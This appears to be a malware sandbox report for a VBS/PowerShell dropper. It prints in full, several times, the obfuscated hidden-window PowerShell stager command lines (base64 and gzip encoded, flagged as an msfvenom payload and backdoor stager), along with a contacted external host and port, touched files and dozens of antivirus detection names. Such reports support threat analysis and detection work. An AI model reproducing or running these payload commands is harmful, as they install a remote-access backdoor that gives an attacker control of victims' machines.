QAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA |
cmdline | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0ANQBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA |
host | 86.104.74.31 |
parent_process | powershell.exe | martian_process | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Lionic | Trojan.Script.Agent.4!c |
Cynet | Malicious (score: 99) |
CTX | txt.trojan.generic |
CAT-QuickHeal | Script.Trojan.42447 |
Skyhigh | BehavesLike.HTML.Dropper.zr |
ALYac | Trojan.Script.905440 |
VIPRE | Trojan.Script.905440 |
Sangfor | Malware.Generic-VBS.Save.facd9283 |
Arcabit | Trojan.Script.DDD0E0 |
Baidu | VBS.Trojan-Downloader.Agent.va |
Symantec | VBS.Heur.SNIC |
ESET-NOD32 | VBS/Agent.NUI |
Avast | VBS:Obfuscated-GQ [Cryp] |
ClamAV | Vbs.Backdoor.Msfvenom_Payload-9951533-0 |
Kaspersky | HEUR:Trojan.VBS.Agent.gen |
BitDefender | Trojan.Script.905440 |
NANO-Antivirus | Trojan.Html.Downloader.fqlyhy |
MicroWorld-eScan | Trojan.Script.905440 |
Rising | Dropper.Ploty!8.EEC8 (TOPIS:E0:Q0eCX8vJheP) |
Emsisoft | Trojan.Script.905440 (B) |
F-Secure | Backdoor:HTML/PowerShellStager.A |
DrWeb | Trojan.Siggen28.55374 |
Sophos | Mal/PSDL-B |
Ikarus | Trojan.PowerShell.Agent |
FireEye | Trojan.Script.905440 |
Detected | |
Avira | VBS/PSRunner.VPA |
Kingsoft | Win32.Infected.AutoInfector.a |
Xcitium | TrojWare.VBS.Agent.NUI@8a4oj4 |
Microsoft | TrojanDropper:VBS/PSRunner.G!MSR |
ZoneAlarm | HEUR:Trojan.VBS.Agent.gen |
GData | Trojan.Script.905440 |
Varist | VBS/Agent.AXB!Eldorado |
McAfee | PS/Injector.d |
Tencent | Heur:Trojan.Powershell.Generic.d |
huorong | Trojan/HTML.Agent.a |
Fortinet | VBS/Inject.B!tr |
AVG | VBS:Obfuscated-GQ [Cryp] |
alibabacloud | Trojan:Win/PSRunner.G9OHT |
dead_host | 86.104.74.31:1911 |
dead_host | 192.168.56.101:49166 |